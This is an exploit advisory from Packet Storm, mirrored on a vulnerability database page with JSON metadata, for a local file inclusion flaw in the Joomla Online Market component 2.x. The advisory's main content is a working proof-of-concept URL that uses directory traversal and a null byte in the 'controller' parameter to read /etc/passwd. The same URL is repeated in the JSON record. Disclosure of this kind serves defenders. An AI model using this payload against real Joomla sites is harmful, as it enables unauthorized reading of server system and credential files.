Search...

Joomla Online Market 2.x Local File Inclusion

2010-04-13T00:00:00

ID PACKETSTORM:88271
Type packetstorm
Reporter AntiSecurity
Modified 2010-04-13T00:00:00

Description

                                        
                                            `  
============================================================================================================  
  
  
[o] Joomla Component Online Market Local File Inclusion Vulnerability  
  
Software : com_market version 2.x  
Vendor : http://dev.pucit.edu.pk/  
Download : http://dev.pucit.edu.pk/files/Online_Market_ver_2.zip  
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]  
Contact : public[at]antisecurity[dot]org  
Home : http://antisecurity.org/  
  
  
============================================================================================================  
  
  
[o] Exploit  
  
http://localhost/[path]/index.php?option=com_market&controller=[LFI]  
  
  
[o] PoC  
  
http://localhost/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00  
  
  
============================================================================================================  
  
  
[o] Greetz  
  
Angela Zhang stardustmemory aJe martfella pizzyroot Genex  
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11  
  
  
============================================================================================================  
  
  
[o] April 12 2010 - GMT +07:00 Jakarta, Indonesia  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/88271/joomlaonlinemarket-lfi.txt", "sourceData": "` \n============================================================================================================ \n \n \n[o] Joomla Component Online Market Local File Inclusion Vulnerability \n \nSoftware : com_market version 2.x \nVendor : http://dev.pucit.edu.pk/ \nDownload : http://dev.pucit.edu.pk/files/Online_Market_ver_2.zip \nAuthor : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ] \nContact : public[at]antisecurity[dot]org \nHome : http://antisecurity.org/ \n \n \n============================================================================================================ \n \n \n[o] Exploit \n \nhttp://localhost/[path]/index.php?option=com_market&controller=[LFI] \n \n \n[o] PoC \n \nhttp://localhost/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 \n \n \n============================================================================================================ \n \n \n[o] Greetz \n \nAngela Zhang stardustmemory aJe martfella pizzyroot Genex \nH312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti \nskulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 \n \n \n============================================================================================================ \n \n \n[o] April 12 2010 - GMT +07:00 Jakarta, Indonesia \n`\n", "edition": 1, "references": [], "modified": "2010-04-13T00:00:00", "hash": "779258c068aa0b4e71c21c795821d934c8cee6a7ad631dc27855c6b3c861edad", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/88271/Joomla-Online-Market-2.x-Local-File-Inclusion.html", "description": "", "id": "PACKETSTORM:88271", "reporter": "AntiSecurity", "lastseen": "2016-11-03T10:20:09", "published": "2010-04-13T00:00:00", "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "vulnersScore": 2.1}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Joomla Online Market 2.x Local File Inclusion", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "8a2e9a434423b1cee668c106811afabb", "key": "href"}, {"hash": "32792082efb06ce75d2f682a53d656c6", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "32792082efb06ce75d2f682a53d656c6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d9cec762ba2413fb0133a492769595da", "key": "reporter"}, {"hash": "ae4f76bd735419eb960244b5c43a5738", "key": "sourceData"}, {"hash": "64bb962a4a4fee55aefd773db623d0a2", "key": "sourceHref"}, {"hash": "70dd01093e875e30e6691762a0847daf", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}